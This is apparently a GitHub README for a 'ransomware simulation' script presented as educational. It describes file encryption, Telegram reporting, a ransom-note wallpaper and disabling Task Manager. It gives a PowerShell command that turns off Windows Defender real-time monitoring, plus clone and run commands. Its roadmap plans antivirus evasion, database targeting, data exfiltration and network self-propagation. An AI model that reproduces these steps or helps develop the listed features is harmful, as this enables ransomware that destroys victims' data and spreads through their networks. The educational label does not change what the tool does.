This repository contains a ransomware simulation script designed for educational purposes. The objective is to demonstrate how ransomware works and how security professionals can analyze and mitigate such threats.
- Generates an encryption key and encrypts user files.
- Sends notifications via Telegram (requires API setup).
- Modifies system wallpaper with a simulated ransom note.
- Disables Task Manager to mimic real-world ransomware behavior.
Do not run this script on a system with real data. If used in a controlled environment (like a virtual machine), proceed with caution.
For security reasons, it is recommended to test this script in an isolated virtual machine.
- Use VirtualBox, VMware, or Hyper-V.
- Create snapshots before running the script to restore the system easily.
- Use Windows Sandbox for a quick testing environment.
Some security software may block execution:
Set-MpPreference -DisableRealtimeMonitoring $true
git clone https://github.com/17tayyy/priv4te
cd priv4te
pip install -r requirements.txt
Run the following PowerShell script to create dummy files in common user directories:
powershell -ExecutionPolicy Bypass -File setup-for-testing.ps1
This will generate test files in:
- Desktop
- Documents
- Downloads
- Pictures
- External Drives
python3 priv4te.py"
- Implement multiple OS support
- Block some user actions
- Replace Fernet with AES-256 for stronger encryption
- Improve Antivirus evasion techniques
- Target databases (
.sql
,.mdb
,.db
) as a priority - Implement Data exfiltration techniques
- Self-propagation in local networks